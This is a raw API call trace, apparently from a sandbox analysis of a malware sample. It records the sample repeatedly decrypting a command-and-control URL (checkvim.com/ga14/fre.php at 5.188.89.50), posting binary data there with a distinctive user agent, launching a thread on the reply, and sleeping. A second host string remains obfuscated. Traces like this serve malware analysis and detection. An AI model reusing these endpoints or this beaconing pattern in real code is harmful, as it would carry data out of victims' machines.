[0310.961] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871290 | out: hHeap=0x840000) returned 1 [0310.961] GetProcessHeap () returned 0x840000 [0310.961] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0310.961] GetProcessHeap () returned 0x840000 [0310.961] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0310.961] GetProcessHeap () returned 0x840000 [0310.961] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0310.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.962] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0310.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.971] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0310.977] GetProcessHeap () returned 0x840000 [0310.977] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0310.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.979] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0310.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.980] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0310.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.981] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.981] GetProcessHeap () returned 0x840000 [0310.981] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0310.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.982] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0310.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.983] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0310.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0310.984] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0310.984] GetProcessHeap () returned 0x840000 [0310.984] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0310.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.985] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0310.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.986] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0310.987] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.987] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0310.988] GetProcessHeap () returned 0x840000 [0310.988] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0310.988] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0310.989] GetProcessHeap () returned 0x840000 [0310.989] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c48 [0310.989] socket (af=2, type=1, protocol=6) returned 0x52c [0310.989] connect (s=0x52c, name=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0311.059] FreeAddrInfoW (pAddrInfo=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0311.059] GetProcessHeap () returned 0x840000 [0311.060] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0311.060] GetProcessHeap () returned 0x840000 [0311.060] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0311.060] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0311.061] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0311.061] GetProcessHeap () returned 0x840000 [0311.061] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0311.061] GetProcessHeap () returned 0x840000 [0311.061] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0311.061] GetProcessHeap () returned 0x840000 [0311.061] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f7a0 [0311.062] GetProcessHeap () returned 0x840000 [0311.062] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0311.062] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0311.063] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0311.063] GetProcessHeap () returned 0x840000 [0311.063] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0311.063] GetProcessHeap () returned 0x840000 [0311.063] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0311.063] send (s=0x52c, buf=0x873a58*, len=237, flags=0) returned 237 [0311.064] send (s=0x52c, buf=0x87eb58*, len=159, flags=0) returned 159 [0311.064] GetProcessHeap () returned 0x840000 [0311.064] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0311.064] recv (in: s=0x52c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0311.463] GetProcessHeap () returned 0x840000 [0311.463] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0311.463] GetProcessHeap () returned 0x840000 [0311.463] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0311.463] GetProcessHeap () returned 0x840000 [0311.463] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0311.464] GetProcessHeap () returned 0x840000 [0311.464] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0311.464] closesocket (s=0x52c) returned 0 [0311.464] GetProcessHeap () returned 0x840000 [0311.464] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c48 | out: hHeap=0x840000) returned 1 [0311.464] GetProcessHeap () returned 0x840000 [0311.464] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0311.464] GetProcessHeap () returned 0x840000 [0311.464] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0311.464] GetProcessHeap () returned 0x840000 [0311.464] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0311.464] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x125c) returned 0x52c [0311.466] Sleep (dwMilliseconds=0xea60) [0311.467] GetProcessHeap () returned 0x840000 [0311.467] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0311.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.468] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0311.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.481] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0311.487] GetProcessHeap () returned 0x840000 [0311.487] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0311.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.488] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e730) returned 1 [0311.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.490] CryptSetKeyParam (hKey=0x87e730, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0311.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.521] CryptSetKeyParam (hKey=0x87e730, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.521] GetProcessHeap () returned 0x840000 [0311.521] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0311.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.522] CryptDecrypt (in: hKey=0x87e730, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0311.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.523] CryptDestroyKey (hKey=0x87e730) returned 1 [0311.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.525] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0311.525] GetProcessHeap () returned 0x840000 [0311.525] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0311.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0311.526] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0311.527] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0311.527] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0311.528] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0311.528] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0311.529] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0311.530] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0311.530] GetProcessHeap () returned 0x840000 [0311.530] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0311.530] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0311.530] GetProcessHeap () returned 0x840000 [0311.530] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0311.530] GetProcessHeap () returned 0x840000 [0311.530] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0311.530] GetProcessHeap () returned 0x840000 [0311.530] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0311.530] GetProcessHeap () returned 0x840000 [0311.530] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f9e0 [0311.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.531] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0311.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.538] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f820) returned 1 [0311.543] GetProcessHeap () returned 0x840000 [0311.543] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0311.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.544] CryptImportKey (in: hProv=0x86f820, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e470) returned 1 [0311.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.545] CryptSetKeyParam (hKey=0x87e470, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0311.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.546] CryptSetKeyParam (hKey=0x87e470, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.546] GetProcessHeap () returned 0x840000 [0311.546] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0311.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.547] CryptDecrypt (in: hKey=0x87e470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f9e0, pdwDataLen=0x19f9a4 | out: pbData=0x87f9e0, pdwDataLen=0x19f9a4) returned 1 [0311.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.563] CryptDestroyKey (hKey=0x87e470) returned 1 [0311.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0311.564] CryptReleaseContext (hProv=0x86f820, dwFlags=0x0) returned 1 [0311.564] GetProcessHeap () returned 0x840000 [0311.564] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0311.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0311.565] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0311.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0311.566] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0311.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0311.567] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0311.567] GetProcessHeap () returned 0x840000 [0311.567] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871268 [0311.567] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0311.568] GetProcessHeap () returned 0x840000 [0311.568] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bb8 [0311.569] socket (af=2, type=1, protocol=6) returned 0x530 [0311.569] connect (s=0x530, name=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0311.642] FreeAddrInfoW (pAddrInfo=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0311.642] GetProcessHeap () returned 0x840000 [0311.642] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0311.642] GetProcessHeap () returned 0x840000 [0311.642] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0311.643] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0311.644] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0311.644] GetProcessHeap () returned 0x840000 [0311.644] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0311.644] GetProcessHeap () returned 0x840000 [0311.644] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0311.644] GetProcessHeap () returned 0x840000 [0311.644] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc68 [0311.644] GetProcessHeap () returned 0x840000 [0311.644] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0311.645] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0311.645] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0311.646] GetProcessHeap () returned 0x840000 [0311.646] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0311.646] GetProcessHeap () returned 0x840000 [0311.646] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0311.646] send (s=0x530, buf=0x873a58*, len=237, flags=0) returned 237 [0311.646] send (s=0x530, buf=0x87eb58*, len=159, flags=0) returned 159 [0311.646] GetProcessHeap () returned 0x840000 [0311.646] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0311.646] recv (in: s=0x530, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0312.016] GetProcessHeap () returned 0x840000 [0312.016] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0312.016] GetProcessHeap () returned 0x840000 [0312.016] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc68 | out: hHeap=0x840000) returned 1 [0312.016] GetProcessHeap () returned 0x840000 [0312.016] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0312.016] GetProcessHeap () returned 0x840000 [0312.016] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0312.016] closesocket (s=0x530) returned 0 [0312.016] GetProcessHeap () returned 0x840000 [0312.016] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bb8 | out: hHeap=0x840000) returned 1 [0312.016] GetProcessHeap () returned 0x840000 [0312.016] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0312.016] GetProcessHeap () returned 0x840000 [0312.017] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f9e0 | out: hHeap=0x840000) returned 1 [0312.017] GetProcessHeap () returned 0x840000 [0312.017] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871268 | out: hHeap=0x840000) returned 1 [0312.017] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1300) returned 0x530 [0312.018] Sleep (dwMilliseconds=0xea60) [0312.020] GetProcessHeap () returned 0x840000 [0312.020] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0312.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.021] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0312.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.026] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0312.031] GetProcessHeap () returned 0x840000 [0312.031] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0312.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.032] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0312.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.033] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0312.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.034] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.034] GetProcessHeap () returned 0x840000 [0312.034] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0312.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.035] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0312.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.036] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0312.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.037] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0312.037] GetProcessHeap () returned 0x840000 [0312.037] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0312.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.038] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0312.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.039] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0312.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.040] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0312.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.041] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0312.041] GetProcessHeap () returned 0x840000 [0312.041] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0312.041] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0312.041] GetProcessHeap () returned 0x840000 [0312.041] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0312.041] GetProcessHeap () returned 0x840000 [0312.041] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0312.041] GetProcessHeap () returned 0x840000 [0312.041] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0312.041] GetProcessHeap () returned 0x840000 [0312.041] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0312.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.042] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0312.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.053] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0312.058] GetProcessHeap () returned 0x840000 [0312.058] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0312.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.059] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0312.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.060] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0312.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.061] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, 